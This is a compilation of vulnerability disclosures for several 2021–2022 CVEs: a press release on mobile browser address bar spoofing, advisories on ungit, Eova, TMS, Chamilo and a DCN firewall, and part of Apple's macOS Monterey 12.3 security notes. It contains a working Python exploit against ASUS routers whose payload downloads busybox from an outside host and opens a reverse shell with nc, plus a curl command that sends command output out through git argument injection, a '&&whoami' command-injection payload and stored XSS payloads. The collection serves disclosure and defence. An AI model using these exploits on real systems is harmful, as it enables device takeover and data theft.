The DuckDuckGo browser 7.64.4 on iOS allows Address Bar Spoofing due to mishandling of the JavaScript window.open function (used to open a secondary browser window). This could be exploited by tricking users into supplying sensitive information such as credentials, because the address bar would display a legitimate URL, but content would be hosted on the attacker's web site.

Press Releases | 8 February 2022

******New address bar vulnerabilities found in DuckDuckGo and Tap Browser, disclosed by Cyber Citadel researchers, could affect millions of iOS and Android users******

Cyber Citadel’s Lead Security Researcher Rafay Baloch and Security Researcher Muhammad Samak disclosed address bar spoofing vulnerabilities today in the DuckDuckGo browser for iOS, Video Downloader Browser for Android and Tap Browser for iOS mobile web browser applications

These flaws can be exploited, by potentially tricking users into supplying sensitive information to a malicious website. Our discovery found that a malicious attacker could easily lead the unsuspecting users to believe that they are visiting a legitimate website as the address bar points to the correct website. It is pertinent to mention here that, Cyber Citadel, as a part of its responsible disclosure policy gave a time frame of 60 days to all three browsers to fix these vulnerabilities. At the time of publishing this disclosure, the issue was only addressed by DuckDuckGo.

****Address Bar Spoofing Vulnerabili**es**

Mobile web browser address bar spoofing allows an attacker to change the URL of a malicious website to one that represents a legitimate website i.e. google.com, bing.com, facebook.com, or apple.com, for example.

This vulnerability bypasses the security certificates built into most modern mobile address bars. Desktop web browsers designate a website as safe by the lock icon on the far left of an address bar that ‘guarantees’ a website has a valid SSL certificate and is, therefore, secure.

On the other hand, security indicators on mobile devices are harder to find, due to the lack of screen real-estate, and restrict the ability to interrogate security elements. With typical users being unaware of website validation on mobile web browsers, cybercriminals are free to insert fake malicious pages with spoofed URL addresses.

Address bar spoofing traditionally scores approximately 4.3 out of 10 on the Common Vulnerability Scoring System (CVSS), technically assigning address bar spoofing with a moderate impact.

However, given the substantial 667% rise in spear-phishing attacks experienced during the COVID-19 pandemic, mobile address bar spoofing should arguably be held in higher regard. In a survey conducted by Mimecast, 2.1 million domains were tied to phishing attacks, with 47% of successful attacks making use of fraudulent websites. The disclosed DuckDuckGo and Tap Browser vulnerabilities directly tie into these figures by allowing cybercriminals to make fraudulent websites more believable and, therefore, more successful in harvesting sensitive information.

**DuckDuckGo**

‘Hatched’ in 2008, DuckDuckGo has become a popular web browsing tool downloaded 5 million times per month as a mobile application or desktop extension. It gives users the ability to browse the web privately, while protecting users from internet trackers.

The recent address bar spoofing CVE-2021-44683 disclosed by Baloch and Samak considerably weakens DuckDuckGo’s promised privacy protections for iOS users.

In the proof of concept (POC), Baloch and Samak revealed that version 7.64.4 of DuckDuckGo’s iOS application was prone to address bar spoofing due to a mishandling of JavaScript’s window.open function used to open a secondary window.

![](https://www.cybercitadel.com/wp-content/uploads/2022/01/DDG-POC-copy-1.jpg)

DuckDuckGo address bar spoofing POC

![](https://www.cybercitadel.com/wp-content/uploads/2022/01/DDG-Evidence.jpg)

DuckDuckGo address bar spoofing evidence

When exploited by a bad actor, an address bar in a secondary window opened in DuckDuckGo would display a legitimate URL despite being hosted by an attacker. This fraudulent page could be designed to trick users into supplying sensitive PII such as usernames and passwords.

**Tap Browser**

Built exclusively for iOS, Tap Browser is used for its additional web browsing functionalities such as easy navigation icons, in-app media players and an in-built VPN service.

Although a relatively low user base (7,000 downloads), the Tap Browser address bar spoofing vulnerability part of the CVE-2021-44683 disclosed by Baloch and Samak was open to secondary window exploitation.

In the POC, Baloch and Samak demonstrated how a secondary window could be spoofed by a bad actor to replicate Facebook, Gmail, Apple and Bing browsers.

![](https://www.cybercitadel.com/wp-content/uploads/2022/01/Tap-ABS-1.jpg)

1\. POC of address bar spoofing in Tap Browser

![](https://www.cybercitadel.com/wp-content/uploads/2022/01/ABS1.png)

1\. Evidence of address bar spoofing in Tap Browser

![](https://www.cybercitadel.com/wp-content/uploads/2022/01/Tap-ABS-2.jpeg)

2\. POC of address bar spoofing in Tap Browser

![](https://www.cybercitadel.com/wp-content/uploads/2022/01/ABS2.png)

2\. Evidence of address bar spoofing in Tap Browser

![](https://www.cybercitadel.com/wp-content/uploads/2022/01/Tap-ABS-3.jpeg)

3\. POC of address bar spoofing in Tap Browser

![](https://www.cybercitadel.com/wp-content/uploads/2022/01/ABS3.png)

3\. Evidence of address bar spoofing in Tap Browser

![](https://www.cybercitadel.com/wp-content/uploads/2022/01/Tap-ABS-4.jpg)

4\. POC of address bar spoofing in Tap Browser

![](https://www.cybercitadel.com/wp-content/uploads/2022/01/ABS4.png)

4\. Evidence of address bar spoofing in Tap Browser

**Response from Vendors**

**Vendor**

**Service**

**Version**

**Platform**

**Reported Date**

**Fixed**

**CVE**

DuckDuckGo

DuckDuckGo

7.64.4

iOS

26/09/21

7.64.18

CVE-2021-44683

Tap Browser

Tap Browser

1.2

iOS

26/09/21

Unfixed

N/A

**HexCon Talk on Address Bar Spoofing Flaws**

This is not the first time, Rafay Baloch has found flaws in browsers. In October 2021 at the Hexcon Security conference, Rafay Baloch presented his findings across various mobile browsers titled “What you see, is not always what you get”. Various categories of address bar spoofing vulnerabilities were discussed along with how these vulnerabilities can be used to abuse security mechanisms in browsers.

**Previous CVEs Disclosed by Cyber Citadel Researchers**

This disclosure by Cyber Citadel security researchers comes a year after Rafay Baloch teamed up with Rapid7’s Director of Research Tod Beardsley to disclose a similar address bar vulnerability across seven mobile web browsers including Apple Safari and Opera Touch.

Baloch reported multiple vulnerabilities on Chrome and Firefox browsers in 2016, Google Inc’s Android browser in 2014, and was paid a total of US$10,000 for reporting a Code Execution/Command Execution vulnerability on PayPal’s sub-domain in 2012. He is considered one of the world’s top ethical hackers and listed in the Google, Facebook, PayPal and Microsoft Hall of Fame.

CVE-2021-44683: Multiple Address Bar Spoofing Flaws in Mobile Browsers - Cyber Citadel

ASUS AC68U <=3.0.0.4.385.20852 is affected by a buffer overflow in blocking.cgi, which may cause a denial of service (DoS).

AC68U FirmwareVersion < 3.0.0.4.385.20633  
RT-AC5300 FirmwareVersion <3.0.0.4.384.82072  
. . . . . .  
此漏洞影响多个路由器型号，具体型号暂未统计，官方2020年8-9月份修复的RCE漏洞（如下图）似乎就是这个  
![image](https://user-images.githubusercontent.com/45091804/146535975-97051c7f-a65e-465a-8ed6-bc15ae5f6e6c.png)

①系统时间+3600-atol(timestap参数)<20 （timestap参数:通过一次空包返回内容来计算时间戳（注意需要根据设备系统设置时区计算） ![image](https://user-images.githubusercontent.com/45091804/146538461-c4dcb76e-d911-42c3-8c2d-ba7e1309f06f.png)  
②sub\_11840函数为nvram\_get，初始MULTIFILTER\_MAC值为空，str("",mac)，所以mac必须为空  

    #coding=utf-8
    from pwn import *
    import re
    import time
    import requests
    import urlparse
    import urllib3
    urllib3.disable_warnings()
    import sys
    
    def rematch(strTmp):
        tm_year = strTmp[0][2]
        tm_month = strTmp[0][1]
        tm_day = strTmp[0][0]
        tm_hour = strTmp[0][3]
        tm_min = strTmp[0][4]
        tm_sec = strTmp[0][5]
        if tm_month == 'Jan':
            tm_month = '01'
        if tm_month == 'Feb':
            tm_month = '02'
        if tm_month == 'Mar':
            tm_month = '03'
        if tm_month == 'Apr ':
            tm_month = '04'
        if tm_month == 'May':
            tm_month = '05'
        if tm_month == 'Jun':
            tm_month = '06'
        if tm_month == 'Jul':
            tm_month = '07'
        if tm_month == 'Aug':
            tm_month = '08'
        if tm_month == 'Sept':
            tm_month = '09'
        if tm_month == 'Oct':
            tm_month = '10'
        if tm_month == 'Nov':
            tm_month = '11'
        if tm_month == 'Dec':
            tm_month = '12'
        tm_hour = int(tm_hour) + 8  # +8对应时区
        time_tmp = '{}-{}-{} {}:{}:{}'.format(tm_year, tm_month, tm_day, tm_hour, tm_min, tm_sec)
        print(time_tmp)
        ts = time.strptime(time_tmp, "%Y-%m-%d %H:%M:%S")
        timeStamp= int(time.mktime(ts))
        return timeStamp
    
    
    def getTime(url):
        scheme =  urlparse.urlparse(url).scheme
        hostname = urlparse.urlparse(url).hostname
        header={
            'Host': hostname,
            'Cache-Control': 'max-age=0',
            'Upgrade-Insecure-Requests': '1',
            'Origin': scheme+'://'+hostname,
            'Content-Type': 'application/x-www-form-urlencoded',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
            'Referer': scheme+'://'+hostname,
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            'Connection':'close'
        }
        data1 ={
            'CName': '',
            'mac': '',
            'interval': '',
            'timestap': '',
        }
        url = url+'/blocking_request.cgi'
        ret = requests.post(url = url ,
                      headers = header,
                      data = data1,
                      verify=False)
        format_time =''
        for key, value in (ret.headers).items():
            if 'Date' in key:
                format_time = value
        tmp = re.findall(r', (.*?) (.*?) (.*?) (.*?):(.*?):(.*?) GMT',format_time)
        timeStap = rematch(tmp) + 3600
        timeStapStr = str(timeStap)
        print(timeStapStr)
        data2 ={
            'CName': 'cd /tmp/home/root;wget http://192.168.2.177:8080/busybox-armv6l;chmod 777 *;./busybox-armv6l nc 192.168.2.177:1234 -e /bin/ash',
            'mac': '',
            'interval': 'a'*12+p32(1)+'a'*16+p32(0x0000EFA8),   
            'timestap': timeStapStr +'a'*4740+p32(0x0006FE35),   #p32(addr) 此addr为interval参数内容首地址
    
        }
        ret = requests.post(url = url ,
                      headers = header,
                      data = data2,
                      verify=False,)
        print('End')
    
    
    if __name__ == '__main__':
        url = sys.argv[1]
        getTime(url)

CVE-2021-45757: GitHub - IBUILI/Asus

A Cross-Site Request Forgery (CSRF) in Chamilo LMS 1.11.14 allows attackers to execute arbitrary commands on victim hosts via user interaction with a crafted URL.

CVE-2021-40662: Security issues - Chamilo LMS

Chamilo LMS v1.11.14 was discovered to contain a zero click code injection vulnerability which allows attackers to execute arbitrary code via a crafted plugin. This vulnerability is triggered through user interaction with the attacker's profile page.

CVE-2021-38745: Security issues - Chamilo LMS

The package ungit before 1.5.20 are vulnerable to Remote Code Execution (RCE) via argument injection. The issue occurs when calling the /api/fetch endpoint. User controlled values (remote and ref) are passed to the git fetch command. By injecting some git options it was possible to get arbitrary command execution.

source: snyk.io

**Vulnerability: Remote Code Execution****Affected Version: \*****Technical Details:**

It's possible to get remote code execution via argument injection.

The issue occurs when calling the /api/fetch endpoint. The user input is passed to the git subcommand fetch. Even if a safe API like spawn is used to execute shell commands (

const gitProcess \= child\_process.spawn(gitBin, args.commands, procOpts);

), in this specific case it's still possible to run arbitrary commands via argument injection.

The fetch subcommand accepts a special argument --upload-pack (https://git-scm.com/docs/git-fetch#Documentation/git-fetch.txt---upload-packltupload-packgt). Since the user controls two values provided to the fetch git subcommand (remote and ref), it is possible to execute arbitrary commands by providing the remote value to be --upload-pack="command to execute". The command executed will be similar to the following:

git fetch --upload-pack="command to execute" foobar

Here is the code that accepts these values:

//

'fetch',

req.body.remote,

req.body.ref ? req.body.ref : '',

config.autoPruneOnFetch ? '--prune' : '',

app.post(  
`${exports.pathPrefix}/fetch`,  
ensureAuthenticated,  
ensurePathExists,  
ensureValidSocketId,  
(req, res) => {  
// Allow a little longer timeout on fetch (10min)  
if (res.setTimeout) res.setTimeout(tenMinTimeoutMs);

      const task = gitPromise({
        commands: credentialsOption(req.body.socketId, req.body.remote).concat([
          'fetch',
          req.body.remote,
          req.body.ref ? req.body.ref : '',
          config.autoPruneOnFetch ? '--prune' : '',
        ]),
        repoPath: req.body.path,
        timeout: tenMinTimeoutMs,
      });
    
      jsonResultOrFailProm(res, task).finally(emitGitDirectoryChanged.bind(null, req.body.path));
    }
    

);

**Potential Fix**

A possible remediation to fix this issue could be to add -- (see here for more information about it https://git-scm.com/docs/gitcli/2.25.0#\_description) before the user provided values (it's just a suggestion):

        commands: credentialsOption(req.body.socketId, req.body.remote).concat([
          'fetch',
          config.autoPruneOnFetch ? '--prune' : '',
          '--',
          req.body.remote,
          req.body.ref ? req.body.ref : ''
        ]),
    

**Proof Of Concept/Steps to Reproduce**

Install ungit and setup a project (I used ungit repo itself)  
cd /home/ubuntu/poc/  
npm install -g ungit  
git clone https://github.com/FredrikNoren/ungit.git  
cd ungit/  
ungit  
the project will be available at http://localhost:8448/#/repository?path=/home/ubuntu/poc/ungit  
RCE Exploitation  
setup a listener for accepting incoming connections:  
nc -nvlp 8000

run the following curl command to get the output of the id command:  
curl -d '{"path":"/home/ubuntu/poc/ungit","remote":"--upload-pack=curl http://localhost:8000/ --data "$(id)"","ref":"foobar","socketId":1}' -H "Content-Type: application/json" -X POST http://localhost:8448/api/fetch

This is the same request sent:

    POST /api/fetch HTTP/1.1
    Host: localhost:8448
    Content-Length: 134
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    Accept: application/json
    Content-Type: application/json
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    sec-ch-ua-platform: "Linux"
    Origin: http://localhost:8448/
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: [http://localhost:8448/
    Accept-Encoding](http://localhost:8448/%0DAccept-Encoding): gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    {"path":"/home/ubuntu/poc/ungit","remote":"--upload-pack=curl http://localhost:8000/ --data \"$(id)\"",
    "ref":"foobar",
    "socketId":1}

CVE-2022-25766: Fix potential remote code exec by jung-kim · Pull Request #1510 · FredrikNoren/ungit

A stored cross-site scripting (XSS) vulnerability in the Add a Button function of Eova v1.6.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the button name text box.

\[Suggested description\]  
Cross SIte Scripting (XSS) vulnerability exists in eova. Because the form submission did not effectively process the special characters entered by the user, the malicious JS code was executed.

\[Vulnerability Type\]  
Cross Site Scripting (XSS)

\[Vendor of Product\]  
https://gitee.com/eova/eova

\[Affected Product Code Base\]  
v1.6.0

\[Affected Component\]  
POST /button/doQuick HTTP/1.1  
Host: localhost:8700  
Content-Length: 147  
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"  
Accept: application/json, text/javascript, _/_; q=0.01  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://localhost:8700  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost:8700/button/quick/biz\_demo\_tree\_code  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: locale=zh-cn; Hm\_lvt\_a4980171086658b20eb2d9b523ae1b7b=1645520663,1645696647; JSESSIONID=D8FBC740992D82D7A03C51EC3BBFEF12  
Connection: close

menu\_code=biz\_demo\_tree\_code&icon=eova-icon0&name=12%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E&ui=%2FTologin&uri=&bs=%2FtoLogin&group\_num=0&role=1

\[Attack Type\]  
Remote

\[Impact Code execution\]  
true

\[Vulnerability proof\]  
Quickly add a button, and enter the malicious JS code in the button name information box.  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0301/145525_cf52be30_9017458.png "屏幕截图.png")

Enter the system management - role management page, select a role for authorization, open the icon display list, and trigger the XSS pop-up window.  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0301/145549_08daa68b_9017458.png "屏幕截图.png")

CVE-2022-26555: There is a stored xss vulnerability exists in eova · Issue #I4VRE9 · EOVA/eova - Gitee.com

TMS v2.28.0 contains an insecure permissions vulnerability via the component /TMS/admin/user/Update2. This vulnerability allows attackers to modify the administrator account and password.

\[Suggested description\]  
There is an ultra vires vulnerability in the function of modifying personal information in TMS.The vulnerability originates from / TMS / admin / user / Update2. The administrator account and password can be modified beyond his authority by modifying the packet parameters.

\[Vulnerability Type\]  
Insecure Permissions

\[Vendor of Product\]  
https://github.com/xiweicheng/tms

\[Affected Product Code Base\]  
v2.28.0

\[Affected Component\]  
POST /tms/admin/user/update2 HTTP/1.1  
Host: localhost:8080  
Content-Length: 66  
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"  
Accept: _/_  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://localhost:8080/  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost:8080/tms/admin/user  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: JSESSIONID=B45BEAFD82AAE86E3D98FE866FA0851E; Hm\_lvt\_a4980171086658b20eb2d9b523ae1b7b=1645604517; Hm\_lpvt\_a4980171086658b20eb2d9b523ae1b7b=1645604534  
Connection: close

username=admin&password=88888888&name=admin&mail=admin%40google.com&=

\[Attack Type\]  
Remote

\[Vulnerability proof\]

1.Access with test account http://localhost:8080/tms/admin  
![image](https://user-images.githubusercontent.com/85676107/155444006-6a467eb6-814c-4f59-8df6-3bbc3d1339ca.png)

2.In order to verify the authenticity of the ultra vires vulnerability, I have prepared a system administrator account. Account number: admin, default password: 88888888.  
![image](https://user-images.githubusercontent.com/85676107/155444066-c4bc8f95-8d4a-44e8-bfca-f282863d6355.png)  
Now I log in to the test account to try to change the information and password of the admin account.

3.Click the user icon in the upper right corner and select Modify in the drop-down box to open the modify personal information pop-up window.  
![image](https://user-images.githubusercontent.com/85676107/155444117-40e555fb-647e-4b40-be6d-13c83f31e4cc.png)  
![image](https://user-images.githubusercontent.com/85676107/155444148-ccf99e0a-91ff-4a61-a732-ed612c35aa56.png)

4.Because there is no need to verify the user's original password, you can set the new password directly. Here, the password is set as change123 in the form submission, and other information will not be changed. Open the burpsuite packet capturing agent - > click the confirm submit button.  
![image](https://user-images.githubusercontent.com/85676107/155444175-0f9890ac-cefc-4960-a4ba-ee09ffba5c06.png)

5.Modify the packet capture data, as shown in the following figure.  
![image](https://user-images.githubusercontent.com/85676107/155444200-a9d0f185-6c03-4642-a7de-5fbf276c9550.png)

6.Click forwad to finish the modification.  
![image](https://user-images.githubusercontent.com/85676107/155444218-0aa54095-ca59-4bac-bf75-e6e295052fc3.png)

The information of viewing admin has changed.Vulnerability recurrence completed.  
![image](https://user-images.githubusercontent.com/85676107/155444254-8f0dbdd3-6361-4c2c-99d8-01c0d04e71bb.png)

CVE-2022-26247: There is a Insecure Permissions vulnerability exists in tms · Issue #16 · xiweicheng/tms

TMS v2.28.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /TMS/admin/setting/mail/createorupdate.

\[Suggested description\]  
Cross SIte Scripting (XSS) vulnerability exists in tms. The cause of the vulnerability is that the input data is not filtered in the foreground page /TMS/admin/setting/mail/ createorupdate, and the input parameters are directly passed into the setting method of AdminController and executed.

\[Vulnerability Type\]  
Cross Site Scripting (XSS)

\[Vendor of Product\]  
https://github.com/xiweicheng/tms

\[Affected Product Code Base\]  
v2.28.0

\[Affected Component\]  
POST /tms/admin/setting/mail/createOrUpdate HTTP/1.1  
Host: localhost:8080  
Content-Length: 113  
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"  
Accept: _/_  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://localhost:8080  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost:8080/tms/admin/setting  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: JSESSIONID=CDC518A82EFF7D857356EBF9AB4206D2; locale=zh-cn; Hm\_lvt\_a4980171086658b20eb2d9b523ae1b7b=1645520663; Hm\_lpvt\_a4980171086658b20eb2d9b523ae1b7b=1645601594  
Connection: close

host=smtp.163.com&port=25%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E&username=someone%40163.com&password=&addr=&=

\[Attack Type\]  
Remote

\[Impact Code execution\]  
true

\[Vulnerability proof\]  
1.Access URL: http://localhost:8080/tms/admin/setting , enter the system setting interface  
![image](https://user-images.githubusercontent.com/85676107/155281262-0816a893-788d-47ab-9f94-9ae081709811.png)

2.Enter JS code in the form: <script> alert ("XSS") </script >  
![image](https://user-images.githubusercontent.com/85676107/155281298-8bd131b0-159d-40cd-ab2e-d5c8e8c8fcc8.png)

![image](https://user-images.githubusercontent.com/85676107/155281339-7f848526-78a9-4822-8ec3-e3b53f129a93.png)

3.Click Save to trigger a pop-up window, and the loophole reappearance is completed.  
![image](https://user-images.githubusercontent.com/85676107/155281371-35b2ff32-4ced-40ea-8a53-dd645a66d20c.png)

4.The cause of the vulnerability is that the input data is not filtered in the foreground page /TMS/admin/setting/mail/ createorupdate, and the input parameters are directly passed into the setting method of AdminController and executed.  
![image](https://user-images.githubusercontent.com/85676107/155281406-8f48ff01-165a-48a0-a911-88518b0bbac1.png)

![image](https://user-images.githubusercontent.com/85676107/155281776-fbc93145-9579-4949-87f3-a5aab75c91e9.png)

CVE-2022-26246: There is a cross site scripting vulnerability exists in tms · Issue #15 · xiweicheng/tms

DCN Firewall DCME-520 was discovered to contain a remote command execution (RCE) vulnerability via the host parameter in the file /system/tool/ping.php.

![](https://www.adminxe.com/wp-content/uploads/2022/02/dcn.png)

**0x00 **Affected component(s)****

    Affected:DCN Firewall DCME-520
    Affected source code file：/www/function/system/tool/ping.php

**0x01 **Vendor of the product(s)** and **vulnerability type****

http://www.digitalchina.com/

Command Execution

**0x02 **Attack vector(s)****

Vulnerability file path ‘/function/system/tool/ping.php’,

the’ host ‘parameter passed in is not strictly filtered.

It is directly brought into the command line and bypassed by payload (& &),

resulting in a command execution vulnerability,

which can obtain server permissions.

**0x03 Suggest**

An issue was discovered in DCN Firewall DCME-520.  
There is a Command Execution that can execute any harmful command on the serveron to control the server。

**0x04 **Source code analysis****

path：

/function/system/tool/ping.php

![](https://www.adminxe.com/wp-content/uploads/2022/02/image-6.png)

the’ host ‘parameter passed in is not strictly filtered.

It is directly brought into the command line and bypassed by payload (& &),

resulting in a command execution vulnerability.

**Command Execution Packet：**

    POST /function/system/tool/ping.php HTTP/1.1
    Host: 127.0.0.1
    Content-Length: 148
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://127.0.0.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://127.0.0.1/function/system/tool/ping.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    Cookie: UILanguage=2; PHPSESSID=62913043f1317aec7e2b041dd895ba4b
    Connection: close
    
    dcn_test_a_120=525&dcn_test_b_120=283&dcn_test_c_120=790&dcn_test_d=_120&doing=ping&host=114.114.114.114%26%26whoami&proto=&count=1
    

payload：

    host=114.114.114.114&&whoami

![](https://www.adminxe.com/wp-content/uploads/2022/02/image-8-1024x248.png)

host=114.114.114.114&&ls

![](https://www.adminxe.com/wp-content/uploads/2022/02/image-9-1024x277.png)

转载请注明：Adminxe's Blog » DCN Firewall DCME-520 has a Command Execution vulnerability

CVE-2022-25390: DCN Firewall DCME-520 has a Command Execution vulnerability – Adminxe's Blog

A logic issue was addressed with improved validation. This issue is fixed in macOS Monterey 12.3. A malicious application may be able to gain root privileges.

Released March 14, 2022

**Accelerate Framework**

Available for: macOS Monterey

Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-22633: an anonymous researcher

**AMD**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-22669: an anonymous researcher

**AppKit**

Available for: macOS Monterey

Impact: A malicious application may be able to gain root privileges

Description: A logic issue was addressed with improved validation.

CVE-2022-22665: Lockheed Martin Red Team

**AppleGraphicsControl**

Available for: macOS Monterey

Impact: An application may be able to gain elevated privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22631: an anonymous researcher

**AppleScript**

Available for: macOS Monterey

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2022-22625: Mickey Jin (@patch1t) of Trend Micro

**AppleScript**

Available for: macOS Monterey

Impact: An application may be able to read restricted memory

Description: This issue was addressed with improved checks.

CVE-2022-22648: an anonymous researcher

**AppleScript**

Available for: macOS Monterey

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2022-22626: Mickey Jin (@patch1t) of Trend Micro

CVE-2022-22627: Qi Sun and Robert Ai of Trend Micro

**AppleScript**

Available for: macOS Monterey

Impact: Processing a maliciously crafted file may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-22597: Qi Sun and Robert Ai of Trend Micro

**BOM**

Available for: macOS Monterey

Impact: A maliciously crafted ZIP archive may bypass Gatekeeper checks

Description: This issue was addressed with improved checks.

CVE-2022-22616: Ferdous Saljooki (@malwarezoo) and Jaron Bradley (@jbradley89) of Jamf Software, Mickey Jin (@patch1t)

**curl**

Available for: macOS Monterey

Impact: Multiple issues in curl

Description: Multiple issues were addressed by updating to curl version 7.79.1.

CVE-2021-22946

CVE-2021-22947

CVE-2021-22945

Entry updated March 21, 2022

**FaceTime**

Available for: macOS Monterey

Impact: A user may send audio and video in a FaceTime call without knowing that they have done so

Description: This issue was addressed with improved checks.

CVE-2022-22643: Sonali Luthar of the University of Virginia, Michael Liao of the University of Illinois at Urbana-Champaign, Rohan Pahwa of Rutgers University, and Bao Nguyen of the University of Florida

**ImageIO**

Available for: macOS Monterey

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2022-22611: Xingyu Jin of Google

**ImageIO**

Available for: macOS Monterey

Impact: Processing a maliciously crafted image may lead to heap corruption

Description: A memory consumption issue was addressed with improved memory handling.

CVE-2022-22612: Xingyu Jin of Google

**Intel Graphics Driver**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A type confusion issue was addressed with improved state handling.

CVE-2022-22661: an anonymous researcher, Peterpan0927 of Alibaba Security Pandora Lab

**IOGPUFamily**

Available for: macOS Monterey

Impact: An application may be able to gain elevated privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-22641: Mohamed Ghannam (@\_simo36)

**Kernel**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22613: Alex, an anonymous researcher

**Kernel**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-22614: an anonymous researcher

CVE-2022-22615: an anonymous researcher

**Kernel**

Available for: macOS Monterey

Impact: A malicious application may be able to elevate privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-22632: Keegan Saunders

**Kernel**

Available for: macOS Monterey

Impact: An attacker in a privileged position may be able to perform a denial of service attack

Description: A null pointer dereference was addressed with improved validation.

CVE-2022-22638: derrek (@derrekr6)

**Kernel**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-22640: sqrtpwn

**libarchive**

Available for: macOS Monterey

Impact: Multiple issues in libarchive

Description: Multiple memory corruption issues existed in libarchive. These issues were addressed with improved input validation.

CVE-2021-36976

**Login Window**

Available for: macOS Monterey

Impact: A person with access to a Mac may be able to bypass Login Window

Description: This issue was addressed with improved checks.

CVE-2022-22647: an anonymous researcher

**LoginWindow**

Available for: macOS Monterey

Impact: A local attacker may be able to view the previous logged in user’s desktop from the fast user switching screen

Description: An authentication issue was addressed with improved state management.

CVE-2022-22656

**GarageBand MIDI**

Available for: macOS Monterey

Impact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution

Description: A memory initialization issue was addressed with improved memory handling.

CVE-2022-22657: Brandon Perry of Atredis Partners

**GarageBand MIDI**

Available for: macOS Monterey

Impact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2022-22664: Brandon Perry of Atredis Partners

**NSSpellChecker**

Available for: macOS Monterey

Impact: A malicious application may be able to access information about a user's contacts

Description: A privacy issue existed in the handling of Contact cards. This was addressed with improved state management.

CVE-2022-22644: an anonymous researcher

**PackageKit**

Available for: macOS Monterey

Impact: An application may be able to gain elevated privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-22617: Mickey Jin (@patch1t)

**Preferences**

Available for: macOS Monterey

Impact: A malicious application may be able to read other applications' settings

Description: The issue was addressed with additional permissions checks.

